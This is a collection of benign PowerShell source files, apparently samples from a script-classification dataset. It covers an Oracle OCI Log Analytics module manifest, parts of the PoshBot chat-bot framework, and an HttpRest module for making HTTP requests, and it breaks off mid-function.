'Confirm-OCILoganalyticsEndpoint', 'Confirm-OCILoganalyticsFile', 'Confirm-OCILoganalyticsLabelCondition', 'Confirm-OCILoganalyticsSource', 'Confirm-OCILoganalyticsSourceExtendedFieldDetails', 'Confirm-OCILoganalyticsSourceMapping', 'Disable-OCILoganalyticsArchiving', 'Disable-OCILoganalyticsAutoAssociation', 'Disable-OCILoganalyticsIngestTimeRule', 'Disable-OCILoganalyticsSourceEventTypes', 'Enable-OCILoganalyticsArchiving', 'Enable-OCILoganalyticsAutoAssociation', 'Enable-OCILoganalyticsIngestTimeRule', 'Enable-OCILoganalyticsSourceEventTypes', 'Export-OCILoganalyticsCustomContent', 'Export-OCILoganalyticsQueryResult', 'Get-OCILoganalyticsAssociableEntitiesList', 'Get-OCILoganalyticsAssociatedEntitiesList', 'Get-OCILoganalyticsAssociationSummary', 'Get-OCILoganalyticsAutoAssociationsList', 'Get-OCILoganalyticsCategoriesList', 'Get-OCILoganalyticsCategory', 'Get-OCILoganalyticsColumnNames', 'Get-OCILoganalyticsConfigWorkRequest', 'Get-OCILoganalyticsConfigWorkRequestsList', 'Get-OCILoganalyticsEffectivePropertiesList', 'Get-OCILoganalyticsEmBridge', 'Get-OCILoganalyticsEmBridgesList', 'Get-OCILoganalyticsEmBridgeSummary', 'Get-OCILoganalyticsEncryptionKeyInfoList', 'Get-OCILoganalyticsEntitiesList', 'Get-OCILoganalyticsEntitiesSummary', 'Get-OCILoganalyticsEntity', 'Get-OCILoganalyticsEntityAssociationsList', 'Get-OCILoganalyticsEntitySourceAssociationsList', 'Get-OCILoganalyticsEntityTopologyList', 'Get-OCILoganalyticsEntityType', 'Get-OCILoganalyticsEntityTypesList', 'Get-OCILoganalyticsField', 'Get-OCILoganalyticsFieldsList', 'Get-OCILoganalyticsFieldsSummary', 'Get-OCILoganalyticsIngestTimeRule', 'Get-OCILoganalyticsIngestTimeRulesList', 'Get-OCILoganalyticsLabel', 'Get-OCILoganalyticsLabelPrioritiesList', 'Get-OCILoganalyticsLabelsList', 'Get-OCILoganalyticsLabelSourceDetailsList', 'Get-OCILoganalyticsLabelSummary', 'Get-OCILoganalyticsLogGroup', 'Get-OCILoganalyticsLogGroupsList', 'Get-OCILoganalyticsLogGroupsSummary', 'Get-OCILoganalyticsLogSetsCount', 'Get-OCILoganalyticsLogSetsList', 'Get-OCILoganalyticsLookup', 'Get-OCILoganalyticsLookupsList', 'Get-OCILoganalyticsLookupSummary', 'Get-OCILoganalyticsMetaSourceTypesList', 'Get-OCILoganalyticsNamespace', 'Get-OCILoganalyticsNamespacesList', 'Get-OCILoganalyticsObjectCollectionRule', 'Get-OCILoganalyticsObjectCollectionRulesList', 'Get-OCILoganalyticsOverlappingRecallsList', 'Get-OCILoganalyticsParser', 'Get-OCILoganalyticsParserFunctionsList', 'Get-OCILoganalyticsParserMetaPluginsList', 'Get-OCILoganalyticsParsersList', 'Get-OCILoganalyticsParserSummary', 'Get-OCILoganalyticsPreferences', 'Get-OCILoganalyticsPropertiesMetadataList', 'Get-OCILoganalyticsQueryResult', 'Get-OCILoganalyticsQueryWorkRequest', 'Get-OCILoganalyticsQueryWorkRequestsList', 'Get-OCILoganalyticsRecallCount', 'Get-OCILoganalyticsRecalledDataList', 'Get-OCILoganalyticsRecalledDataSize', 'Get-OCILoganalyticsResourceCategoriesList', 'Get-OCILoganalyticsRulesList', 'Get-OCILoganalyticsRulesSummary', 'Get-OCILoganalyticsScheduledTask', 'Get-OCILoganalyticsScheduledTasksList', 'Get-OCILoganalyticsSource', 'Get-OCILoganalyticsSourceAssociationsList', 'Get-OCILoganalyticsSourceEventTypesList', 'Get-OCILoganalyticsSourceExtendedFieldDefinitionsList', 'Get-OCILoganalyticsSourceLabelOperatorsList', 'Get-OCILoganalyticsSourceMetaFunctionsList', 'Get-OCILoganalyticsSourcePatternsList', 'Get-OCILoganalyticsSourcesList', 'Get-OCILoganalyticsSourceSummary', 'Get-OCILoganalyticsStorage', 'Get-OCILoganalyticsStorageUsage', 'Get-OCILoganalyticsStorageWorkRequest', 'Get-OCILoganalyticsStorageWorkRequestErrorsList', 'Get-OCILoganalyticsStorageWorkRequestsList', 'Get-OCILoganalyticsSupportedCharEncodingsList', 'Get-OCILoganalyticsSupportedTimezonesList', 'Get-OCILoganalyticsUnprocessedDataBucket', 'Get-OCILoganalyticsUpload', 'Get-OCILoganalyticsUploadFilesList', 'Get-OCILoganalyticsUploadsList', 'Get-OCILoganalyticsUploadWarningsList', 'Get-OCILoganalyticsWarningsList', 'Get-OCILoganalyticsWorkRequest', 'Get-OCILoganalyticsWorkRequestErrorsList', 'Get-OCILoganalyticsWorkRequestLogsList', 'Get-OCILoganalyticsWorkRequestsList', 'Import-OCILoganalyticsCustomContent', 'Invoke-OCILoganalyticsAppendLookupData', 'Invoke-OCILoganalyticsAssignEncryptionKey', 'Invoke-OCILoganalyticsBatchGetBasicInfo', 'Invoke-OCILoganalyticsClean', 'Invoke-OCILoganalyticsCompareContent', 'Invoke-OCILoganalyticsEstimatePurgeDataSize', 'Invoke-OCILoganalyticsEstimateRecallDataSize', 'Invoke-OCILoganalyticsEstimateReleaseDataSize', 'Invoke-OCILoganalyticsExtractStructuredLogFieldPaths', 'Invoke-OCILoganalyticsExtractStructuredLogHeaderPaths', 'Invoke-OCILoganalyticsFilter', 'Invoke-OCILoganalyticsOffboardNamespace', 'Invoke-OCILoganalyticsOnboardNamespace', 'Invoke-OCILoganalyticsParseQuery', 'Invoke-OCILoganalyticsPauseScheduledTask', 'Invoke-OCILoganalyticsPurgeStorageData', 'Invoke-OCILoganalyticsQuery', 'Invoke-OCILoganalyticsRecallArchivedData', 'Invoke-OCILoganalyticsReleaseRecalledData', 'Invoke-OCILoganalyticsResumeScheduledTask', 'Invoke-OCILoganalyticsRun', 'Invoke-OCILoganalyticsSetUnprocessedDataBucket', 'Invoke-OCILoganalyticsSuggest', 'Invoke-OCILoganalyticsSuppressWarning', 'Invoke-OCILoganalyticsTestParser', 'Invoke-OCILoganalyticsUnsuppressWarning', 'Invoke-OCILoganalyticsUpsertAssociations', 'Invoke-OCILoganalyticsUpsertField', 'Invoke-OCILoganalyticsUpsertLabel', 'Invoke-OCILoganalyticsUpsertParser', 'Invoke-OCILoganalyticsUpsertSource', 'Invoke-OCILoganalyticsVerify', 'Move-OCILoganalyticsEmBridgeCompartment', 'Move-OCILoganalyticsEntityCompartment', 'Move-OCILoganalyticsIngestTimeRuleCompartment', 'Move-OCILoganalyticsLogGroupCompartment', 'Move-OCILoganalyticsObjectCollectionRuleCompartment', 'Move-OCILoganalyticsScheduledTaskCompartment', 'New-OCILoganalyticsEmBridge', 'New-OCILoganalyticsEntity', 'New-OCILoganalyticsEntityType', 'New-OCILoganalyticsIngestTimeRule', 'New-OCILoganalyticsLogGroup', 'New-OCILoganalyticsObjectCollectionRule', 'New-OCILoganalyticsScheduledTask', 'Register-OCILoganalyticsLookup', 'Remove-OCILoganalyticsAssociations', 'Remove-OCILoganalyticsEmBridge', 'Remove-OCILoganalyticsEntity', 'Remove-OCILoganalyticsEntityAssociations', 'Remove-OCILoganalyticsEntityType', 'Remove-OCILoganalyticsField', 'Remove-OCILoganalyticsIngestTimeRule', 'Remove-OCILoganalyticsLabel', 'Remove-OCILoganalyticsLogGroup', 'Remove-OCILoganalyticsLookup', 'Remove-OCILoganalyticsObjectCollectionRule', 'Remove-OCILoganalyticsParser', 'Remove-OCILoganalyticsPreferences', 'Remove-OCILoganalyticsResourceCategories', 'Remove-OCILoganalyticsScheduledTask', 'Remove-OCILoganalyticsSource', 'Remove-OCILoganalyticsSourceEventTypes', 'Remove-OCILoganalyticsUpload', 'Remove-OCILoganalyticsUploadFile', 'Remove-OCILoganalyticsUploadWarning', 'Stop-OCILoganalyticsQueryWorkRequest', 'Update-OCILoganalyticsEmBridge', 'Update-OCILoganalyticsEntity', 'Update-OCILoganalyticsEntityType', 'Update-OCILoganalyticsIngestTimeRule', 'Update-OCILoganalyticsLogGroup', 'Update-OCILoganalyticsLookup', 'Update-OCILoganalyticsLookupData', 'Update-OCILoganalyticsObjectCollectionRule', 'Update-OCILoganalyticsPreferences', 'Update-OCILoganalyticsResourceCategories', 'Update-OCILoganalyticsScheduledTask', 'Update-OCILoganalyticsStorage', 'Write-OCILoganalyticsDiscoveryData', 'Write-OCILoganalyticsLogEventsFile', 'Write-OCILoganalyticsLogFile', 'Write-OCILoganalyticsQueryWorkRequestBackground' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Loganalytics' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/3298.ps1
3298.ps1
function Get-PoshBotStatefulData { [System.Diagnostics.CodeAnalysis.SuppressMessageAttribute('PSAvoidGlobalVars', '', Scope='Function', Target='*')] [cmdletbinding()] param( [string]$Name = '*', [switch]$ValueOnly, [validateset('Global','Module')] [string]$Scope = 'Module' ) process { if($Scope -eq 'Module') { $FileName = "$($global:PoshBotContext.Plugin).state" } else { $FileName = "PoshbotGlobal.state" } $Path = Join-Path $global:PoshBotContext.ConfigurationDirectory $FileName if(-not (Test-Path $Path)) { Write-Verbose "Requested stateful data file not found: [$Path]" return } Write-Verbose "Getting stateful data from [$Path]" $Output = Import-Clixml -Path $Path | Select-Object -Property $Name if($ValueOnly) { $Output = $Output.${Name} } $Output } } Export-ModuleMember -Function 'Get-PoshBotStatefulData'
combined_dataset/train/non-malicious/3266.ps1
3266.ps1
class CommandExecutor : BaseLogger { [RoleManager]$RoleManager hidden [Bot]$_bot [int]$HistoryToKeep = 100 [int]$ExecutedCount = 0 [System.Collections.ArrayList]$History = (New-Object System.Collections.ArrayList) hidden [hashtable]$_jobTracker = @{} CommandExecutor([RoleManager]$RoleManager, [Logger]$Logger, [Bot]$Bot) { $this.RoleManager = $RoleManager $this.Logger = $Logger $this._bot = $Bot } [void]ExecuteCommand([CommandExecutionContext]$cmdExecContext) { if (-not $cmdExecContext.Command.Enabled) { $err = [CommandDisabled]::New("Command [$($cmdExecContext.Command.Name)] is disabled") $cmdExecContext.Complete = $true $cmdExecContext.Ended = (Get-Date).ToUniversalTime() $cmdExecContext.Result.Success = $false $cmdExecContext.Result.Errors += $err $this.LogInfo([LogSeverity]::Error, $err.Message, $err) $this.TrackJob($cmdExecContext) return } if ($cmdExecContext.Command.TriggerType -eq [TriggerType]::Command) { if (-not $this.ValidateMandatoryParameters($cmdExecContext.ParsedCommand, $cmdExecContext.Command)) { $msg = "Mandatory parameters for [$($cmdExecContext.Command.Name)] not provided.`nUsage:`n" foreach ($usage in $cmdExecContext.Command.Usage) { $msg += " $usage`n" } $err = [CommandRequirementsNotMet]::New($msg) $cmdExecContext.Complete = $true $cmdExecContext.Ended = (Get-Date).ToUniversalTime() $cmdExecContext.Result.Success = $false $cmdExecContext.Result.Errors += $err $this.LogInfo([LogSeverity]::Error, $err.Message, $err) $this.TrackJob($cmdExecContext) return } } if ($cmdExecContext.Command.TriggerType -in @('Command', 'Regex')) { $authorized = $cmdExecContext.Command.IsAuthorized($cmdExecContext.Message.From, $this.RoleManager) } else { $authorized = $true } if ($authorized) { if ($this.ApprovalNeeded($cmdExecContext)) { $cmdExecContext.ApprovalState = [ApprovalState]::Pending $this._bot.Backend.AddReaction($cmdExecContext.Message, [ReactionType]::ApprovalNeeded) if (-not $this._bot.DeferredCommandExecutionContexts.ContainsKey($cmdExecContext.id)) { $this._bot.DeferredCommandExecutionContexts.Add($cmdExecContext.id, $cmdExecContext) } else { $this.LogInfo([LogSeverity]::Error, "This shouldn't happen, but command execution context [$($cmdExecContext.id)] is already in the deferred bucket") } $approverGroups = $this.GetApprovalGroups($cmdExecContext) -join ', ' $prefix = $this._bot.Configuration.CommandPrefix $msg = "Approval is needed to run [$($cmdExecContext.ParsedCommand.CommandString)] from someone in the approval group(s) [$approverGroups]." $msg += "`nTo approve, say '$($prefix)approve $($cmdExecContext.Id)'." $msg += "`nTo deny, say '$($prefix)deny $($cmdExecContext.Id)'." $msg += "`nTo list pending approvals, say '$($prefix)pending'." $response = [Response]::new($cmdExecContext.Message) $response.Data = New-PoshBotCardResponse -Type Warning -Title "Approval Needed for [$($cmdExecContext.ParsedCommand.CommandString)]" -Text $msg $this._bot.SendMessage($response) return } else { if ($cmdExecContext.Command.TriggerType -in @('Command', 'Regex')) { if ($this._bot.Configuration.AddCommandReactions) { $this._bot.Backend.AddReaction($cmdExecContext.Message, [ReactionType]::Processing) } } if ($cmdExecContext.Command.AsJob) { $this.LogDebug("Command [$($cmdExecContext.FullyQualifiedCommandName)] will be executed as a job") $cmdExecContext.IsJob = $true $cmdExecContext.Job = $cmdExecContext.Command.Invoke($cmdExecContext.ParsedCommand, $true,$this._bot.Backend.GetType().Name) $this.LogDebug("Command [$($cmdExecContext.FullyQualifiedCommandName)] executing in job [$($cmdExecContext.Job.Id)]") $cmdExecContext.Complete = $false } else { try { $cmdExecContext.IsJob = $false $hash = $cmdExecContext.Command.Invoke($cmdExecContext.ParsedCommand, $false,$this._bot.Backend.GetType().Name) $cmdExecContext.Complete = $true $cmdExecContext.Ended = (Get-Date).ToUniversalTime() $cmdExecContext.Result.Errors = $hash.Error $cmdExecContext.Result.Streams.Error = $hash.Error $cmdExecContext.Result.Streams.Information = $hash.Information $cmdExecContext.Result.Streams.Warning = $hash.Warning $cmdExecContext.Result.Output = $hash.Output if ($cmdExecContext.Result.Errors.Count -gt 0) { $cmdExecContext.Result.Success = $false } else { $cmdExecContext.Result.Success = $true } $this.LogVerbose("Command [$($cmdExecContext.FullyQualifiedCommandName)] completed with successful result [$($cmdExecContext.Result.Success)]") } catch { $cmdExecContext.Complete = $true $cmdExecContext.Result.Success = $false $cmdExecContext.Result.Errors = $_.Exception.Message $cmdExecContext.Result.Streams.Error = $_.Exception.Message $this.LogInfo([LogSeverity]::Error, $_.Exception.Message, $_) } } } } else { $msg = "Command [$($cmdExecContext.Command.Name)] was not authorized for user [$($cmdExecContext.Message.From)]" $err = [CommandNotAuthorized]::New($msg) $cmdExecContext.Complete = $true $cmdExecContext.Result.Errors += $err $cmdExecContext.Result.Success = $false $cmdExecContext.Result.Authorized = $false $this.LogInfo([LogSeverity]::Error, $err.Message, $err) $this.TrackJob($cmdExecContext) return } $this.TrackJob($cmdExecContext) } [void]TrackJob([CommandExecutionContext]$CommandContext) { if (-not $this._jobTracker.ContainsKey($CommandContext.Id)) { $this.LogVerbose("Adding job [$($CommandContext.Id)] to tracker") $this._jobTracker.Add($CommandContext.Id, $CommandContext) } } [CommandExecutionContext[]]ReceiveJob() { $results = New-Object System.Collections.ArrayList if ($this._jobTracker.Count -ge 1) { $completedJobs = $this._jobTracker.GetEnumerator() | Where-Object {($_.Value.Complete -eq $true) -or ($_.Value.IsJob -and (($_.Value.Job.State -eq 'Completed') -or ($_.Value.Job.State -eq 'Failed')))} | Select-Object -ExpandProperty Value foreach ($cmdExecContext in $completedJobs) { if ($cmdExecContext.IsJob) { if ($cmdExecContext.Job.State -eq 'Completed') { $this.LogVerbose("Job [$($cmdExecContext.Id)] is complete") $cmdExecContext.Complete = $true $cmdExecContext.Ended = (Get-Date).ToUniversalTime() $cmdExecContext.Result.Errors = $cmdExecContext.Job.ChildJobs[0].Error.ReadAll() $cmdExecContext.Result.Streams.Error = $cmdExecContext.Result.Errors $cmdExecContext.Result.Streams.Information = $cmdExecContext.Job.ChildJobs[0].Information.ReadAll() $cmdExecContext.Result.Streams.Verbose = $cmdExecContext.Job.ChildJobs[0].Verbose.ReadAll() $cmdExecContext.Result.Streams.Warning = $cmdExecContext.Job.ChildJobs[0].Warning.ReadAll() $cmdExecContext.Result.Output = $cmdExecContext.Job.ChildJobs[0].Output.ReadAll() if ($cmdExecContext.Result.Streams.Error.Count -gt 0) { $cmdExecContext.Result.Success = $false } else { $cmdExecContext.Result.Success = $true } $this.LogVerbose("Command [$($cmdExecContext.FullyQualifiedCommandName)] completed with successful result [$($cmdExecContext.Result.Success)]") Remove-Job -Job $cmdExecContext.Job } elseIf ($cmdExecContext.Job.State -eq 'Failed') { $cmdExecContext.Complete = $true $cmdExecContext.Result.Success = $false $this.LogVerbose("Command [$($cmdExecContext.FullyQualifiedCommandName)] failed") } } if ($cmdExecContext.Command.TriggerType -in @('Command', 'Regex')) { if ($this._bot.Configuration.AddCommandReactions) { if (-not $cmdExecContext.Result.Success) { $reaction = [ReactionType]::Failure } elseIf ($cmdExecContext.Result.Streams.Warning.Count -gt 0) { $reaction = [ReactionType]::Warning } else { $reaction = [ReactionType]::Success } $this._bot.Backend.AddReaction($cmdExecContext.Message, $reaction) } } if ($cmdExecContext.Command.KeepHistory) { $this.AddToHistory($cmdExecContext) } $this.LogVerbose("Removing job [$($cmdExecContext.Id)] from tracker") $this._jobTracker.Remove($cmdExecContext.Id) if ($cmdExecContext.Command.TriggerType -in @('Command', 'Regex')) { if ($this._bot.Configuration.AddCommandReactions) { $this._bot.Backend.RemoveReaction($cmdExecContext.Message, [ReactionType]::Processing) } } if ($cmdExecContext.Result.Success) { $this.ExecutedCount++ } $cmdExecContext.Result.Duration = ($cmdExecContext.Ended - $cmdExecContext.Started) $results.Add($cmdExecContext) > $null } } return $results } [void]AddToHistory([CommandExecutionContext]$CmdExecContext) { if ($this.History.Count -ge $this.HistoryToKeep) { $this.History.RemoveAt(0) > $null } $this.LogDebug("Adding command execution [$($CmdExecContext.Id)] to history") $this.History.Add($CmdExecContext) } [bool]ValidateMandatoryParameters([ParsedCommand]$ParsedCommand, [Command]$Command) { $validated = $false if ($Command.FunctionInfo) { $parameterSets = $Command.FunctionInfo.ParameterSets } else { $parameterSets = $Command.CmdletInfo.ParameterSets } foreach ($parameterSet in $parameterSets) { $this.LogDebug("Validating parameters for parameter set [$($parameterSet.Name)]") $mandatoryParameters = @($parameterSet.Parameters | Where-Object {$_.IsMandatory -eq $true}).Name if ($mandatoryParameters.Count -gt 0) { $this.LogDebug('Provided named parameters', $ParsedCommand.NamedParameters.Keys) foreach ($providedNamedParameter in $ParsedCommand.NamedParameters.Keys ) { $this.LogDebug("Named parameter [$providedNamedParameter] provided") $mandatoryParameters = @($mandatoryParameters | Where-Object {$_ -ne $providedNamedParameter}) } if ($mandatoryParameters.Count -gt 0) { if ($ParsedCommand.PositionalParameters.Count -lt $mandatoryParameters.Count) { $validated = $false } else { $validated = $true } } else { $validated = $true } } else { $validated = $true } $this.LogDebug("Valid parameters for parameterset [$($parameterSet.Name)] - [$($validated.ToString())]") if ($validated) { break } } return $validated } [bool]ApprovalNeeded([CommandExecutionContext]$Context) { if ($Context.ApprovalState -ne [ApprovalState]::Approved) { foreach ($approvalConfig in $this._bot.Configuration.ApprovalConfiguration.Commands) { if ($Context.FullyQualifiedCommandName -like $approvalConfig.Expression) { $approvalGroups = $this._bot.RoleManager.GetUserGroups($Context.ParsedCommand.From).Name if (-not $approvalGroups) { $approvalGroups = @() } $compareParams = @{ ReferenceObject = $this.GetApprovalGroups($Context) DifferenceObject = $approvalGroups PassThru = $true IncludeEqual = $true ExcludeDifferent = $true } $inApprovalGroup = (Compare-Object @compareParams).Count -gt 0 $Context.ApprovalState = [ApprovalState]::Pending $this.LogDebug("Execution context ID [$($Context.Id)] needs approval from group(s) [$(($compareParams.ReferenceObject) -join ', ')]") if ($inApprovalGroup) { if ($approvalConfig.PeerApproval) { $this.LogDebug("Execution context ID [$($Context.Id)] needs peer approval") } else { $this.LogInfo("Peer Approval not needed to execute context ID [$($Context.Id)]") } return $approvalConfig.PeerApproval } else { $this.LogInfo("Approval needed to execute context ID [$($Context.Id)]") return $true } } } } return $false } [string[]]GetApprovalGroups([CommandExecutionContext]$Context) { foreach ($approvalConfig in $this._bot.Configuration.ApprovalConfiguration.Commands) { if ($Context.FullyQualifiedCommandName -like $approvalConfig.Expression) { return $approvalConfig.ApprovalGroups } } return @() } }
combined_dataset/train/non-malicious/HttpRest 1.0.1.ps1
HttpRest 1.0.1.ps1
## Http Rest #################################################################################################### ## The first implementation of the HttpRest module, as a bunch of script functions ## Based on the REST api from MindTouch's Dream SDK ## ## INSTALL: ## You need log4net.dll mindtouch.core.dll mindtouch.dream.dll and SgmlReaderDll.dll from the SDK ## Download DREAM from http`://sourceforge.net/project/showfiles.php?group_id=173074 ## Unpack it, and you can find these dlls in the "dist" folder. ## Make sure to put them in the folder with the module. ## ## For documentation of Dream: http`://wiki.developer.mindtouch.com/Dream #################################################################################################### ## Version History ## 1.0 First Release ## 1.0.1 Added Get-WebPageContent #################################################################################################### ## Usage: ## function Get-Google { ## Invoke-Http GET http`://www.google.com/search @{q=$args} | ## Receive-Http Xml "//h3[@class='r']/a" | Select href, InnerText ## } ## ######################################################################### ## function Get-WebFile($url,$cred) { ## Invoke-Http GET $url -auth $cred | Receive-Http File ## } ## ######################################################################### ## function Send-Paste { ## PARAM($PastebinURI="http`://posh.jaykul.com/p/",[IO.FileInfo]$file) ## PROCESS { ## if($_){[IO.FileInfo]$file=$_} ## ## if($file.Exists) { ## $ofs="`n" ## $result = Invoke-Http POST $PastebinURI @{ ## format="posh" # PowerShell ## expiry="d" # (d)ay or (m)onth or (f)orever ## poster=$([Security.Principal.WindowsIdentity]::GetCurrent().Name.Split("\\")[-1]) ## code2="$((gc $file) -replace "http`://","http``://")" # To get past the spam filter. ## paste="Send" ## } -Type FORM_URLENCODED -Wait ## $xml = $result.AsDocument().ToXml() ## write-output $xml.SelectSingleNode("//*[@class='highlight']/*").href ## } else { throw "File Not Found" } ## }} ## #################################################################################################### if(!$PSScriptRoot){ Write-Debug $($MyInvocation.MyCommand | out-string) $PSScriptRoot=(Split-Path $MyInvocation.MyCommand.Path -Parent) } # Write-Debug "Invocation: $($MyInvocation.MyCommand.Path)" # Write-Debug "Invocation: $($MyInvocation.MyCommand)" # Write-Debug "Invocation: $($MyInvocation)" Write-Debug "PSScriptRoot: '$PSScriptRoot'" # This Module depends on MindTouch.Dream $null = [Reflection.Assembly]::LoadFrom( "$PSScriptRoot\\mindtouch.dream.dll" ) # MindTouch.Dream requires: mindtouch.dream.dll, mindtouch.core.dll, SgmlReaderDll.dll, and log4net.dll) # This Module also depends on utility functions from System.Web $null = [Reflection.Assembly]::LoadWithPartialName("System.Web") ## Some utility functions are defined at the bottom [uri]$global:url = "" [System.Management.Automation.PSCredential]$global:HttpRestCredential = $null function Get-DreamMessage($Content,$Type) { if(!$Content) { return [MindTouch.Dream.DreamMessage]::Ok() } if( $Content -is [System.Xml.XmlDocument]) { return [MindTouch.Dream.DreamMessage]::Ok( $Content ) } if(Test-Path $Content -EA "SilentlyContinue") { return [MindTouch.Dream.DreamMessage]::FromFile((Convert-Path (Resolve-Path $Content))); } if($Type -is [String]) { $Type = [MindTouch.Dream.MimeType]::$Type } if($Type -is [MindTouch.Dream.DreamMessage]) { return [MindTouch.Dream.DreamMessage]::Ok( $Type, $Content ) } else { return [MindTouch.Dream.DreamMessage]::Ok( $([MindTouch.Dream.MimeType]::TEXT), $Content ) } } function Get-DreamPlug { PARAM ( $Url, [hashtable]$With ) if($Url -is [array]) { if($Url[0] -is [hashtable]) { $plug = [MindTouch.Dream.Plug]::New($global:url) foreach($param in $url.GetEnumerator()) { if($param.Value) { $plug = $plug.At($param.Key,"=$(Encode-Twice $param.Value)") } else { $plug = $plug.At($param.Key) } } } else { [URI]$uri = Join-Url $global:url $url $plug = [MindTouch.Dream.Plug]::New($uri) } } elseif($url -is [string]) { [URI]$uri = $url if(!$uri.IsAbsoluteUri) { $uri = Join-Url $global:url $url } $plug = [MindTouch.Dream.Plug]::New($uri) } else { $plug = [MindTouch.Dream.Plug]::New($global:url) } if($with) { foreach($param in $with.GetEnumerator()) { if($param.Value) { $plug = $plug.With($param.Key,$param.Value) } } } return $plug } #CMDLET Receive-Http { Function Receive-Http { PARAM( # [Parameter(Position=1, Mandatory=$false)] # [ValidateSet("Xml", "File", "Text","Bytes")] # [Alias("As")] $Output = "Xml" , # [Parameter(Position=2, Mandatory=$false)] [string]$Path , # [Parameter(Mandatory=$true, ValueFromPipeline=$true, ParameterSetName="Result")] # [Alias("IO")] # [MindTouch.Dream.Result``1[[MindTouch.Dream.DreamMessage]]] $InputObject #, # [Parameter(Mandatory=$true, ValueFromPipeline=$true, ParameterSetName="Response")] # [MindTouch.Dream.DreamMessage] # $response ) BEGIN { if($InputObject) { Write-Output $inputObject | Receive-Http $Output $Path } # else they'd better pass it in on the pipeline ... } PROCESS { $response = $null if($_ -is [MindTouch.Dream.Result``1[[MindTouch.Dream.DreamMessage]]]) { $response = $_.Wait() } elseif($_ -is [MindTouch.Dream.DreamMessage]) { $response = $_ } elseif($_) { throw "We can only pipeline [MindTouch.Dream.DreamMessage] objects, or [MindTouch.Dream.Result`1[DreamMessage]] objects" } if($response) { Write-Debug $($response | Out-String) if(!$response.IsSuccessful) { Write-Error $($response | Out-String) Write-Verbose $response.AsText() throw "ERROR: '$($response.Status)' Response Status." } else { switch($Output) { "File" { ## Joel's magic filename guesser ... if(!$Path) { [string]$fileName = ([regex]'(?i)filename=(.*)$').Match( $response.Headers["Content-Disposition"] ).Groups[1].Value $Path = $fileName.trim("\\/""'") if(!$Path) { $fileName = $response.ResponseUri.Segments[-1] $Path = $fileName.trim("\\/") if(!([IO.FileInfo]$Path).Extension) { $Path = $Path + "." + $response.ContentType.Split(";")[0].Split("/")[1] } } } $File = Get-FileName $Path [StreamUtil]::CopyToFile( $response.AsStream(), $response.ContentLength, $File ) Get-ChildItem $File } "XDoc" { if($Path) { $response.AsDocument()[$Path] } else { $response.AsDocument()#.ToXml() } } "Xml" { if($Path) { $response.AsDocument().ToXml().SelectNodes($Path) } else { $response.AsDocument().ToXml() } } "Text" { if($Path) { $response.AsDocument()[$Path] | % { $_.AsText } } else { $response.AsText() } } "Bytes" { $response.AsBytes() } } } } } } ## http`://www.w3.org/Protocols/rfc2616/rfc2616-sec9.html ## Nobody actually uses HEAD or OPTIONS, right? ## And nobody's even heard of TRACE or CONNECT ;) # CMDLET Invoke-Http { Function Invoke-Http { PARAM( # [Parameter(Position=0, Mandatory=$false)] # [ValidateSet("Post", "Get", "Put", "Delete", "Head", "Options")] ## There are other verbs, but we need a list to make sure you don't screw up [string]$Verb = "Get" , # [Parameter(Position=1, Mandatory=$false, ValueFromPipeline=$true)] # [string] $Path , # [Parameter(Position=2, Mandatory=$false)] [hashtable]$with , # [Parameter(Position=3, Mandatory=$false)] $Content , $Type # Of Content , $authenticate , [switch]$waitForResponse ) BEGIN { $Verbs = "Post", "Get", "Put", "Delete", "Head", "Options" if($Verbs -notcontains $Verb) { Write-Warning "The specified verb '$Verb' is NOT one of the common verbs: $Verbs" } if($Path) { if($Content) { Write-Output ($Path | Invoke-Http $Verb -With $With -Content $Content -Type $Type -Authenticate $authenticate -waitForResponse:$WaitForResponse) } else { Write-Output ($Path | Invoke-Http $Verb -With $With -Type $Type-Authenticate $authenticate -waitForResponse:$WaitForResponse) } } # else they'd better pass it in on the pipeline ... } PROCESS { if($_) { $Path = $_ $plug = Get-DreamPlug $Path $With Write-Verbose "Content Type: $Type" Write-Verbose "Content: $Content" ## Special Handling for FORM_URLENCODED if($Type -like "Form*" -and !$Content) { $dream = [MindTouch.Dream.DreamMessage]::Ok( $Plug.Uri ) $Plug = [MindTouch.Dream.Plug]::New( $Plug.Uri.SchemeHostPortPath ) Write-Verbose "RECREATED Plug: $($Plug.Uri.SchemeHostPortPath)" } else { $dream = Get-DreamMessage $Content $Type } if(!$plug -or !$dream) { throw "Can't come up with a request!" } Write-Verbose $( $dream | Out-String ) if($authenticate){ Write-Verbose "AUTHENTICATE AS $($authenticate.UserName)" if($authenticate -is [System.Management.Automation.PSCredential]) { Write-Verbose "AUTHENTICATING AS $($authenticate.UserName)" $plug = $plug.WithCredentials($authenticate.UserName, ($authenticate.GetNetworkCredential().Password)) } elseif($authenticate -is [System.Net.NetworkCredential]) { Write-Verbose "AUTHENTICATING AS $($authenticate.UserName)" $plug = $plug.WithCredentials($authenticate.UserName, $authenticate.Password) } else { Get-HttpCredential Write-Verbose "AUTHENTICATING AS $($authenticate.UserName)" $plug = $plug.WithCredentials($global:HttpRestCredential.UserName, $global:HttpRestCredential.Password) } } Write-Verbose $plug.Uri ## DEBUG: Write-Debug "URI: $($Plug.Uri)" Write-Debug "Verb: $($Verb.ToUpper())" Write-Debug $($dream | Out-String) $result = $plug.InvokeAsync( $Verb.ToUpper(), $dream ) Write-Debug $($result | Out-String) # if($DebugPreference -eq "Continue") { # Write-Debug 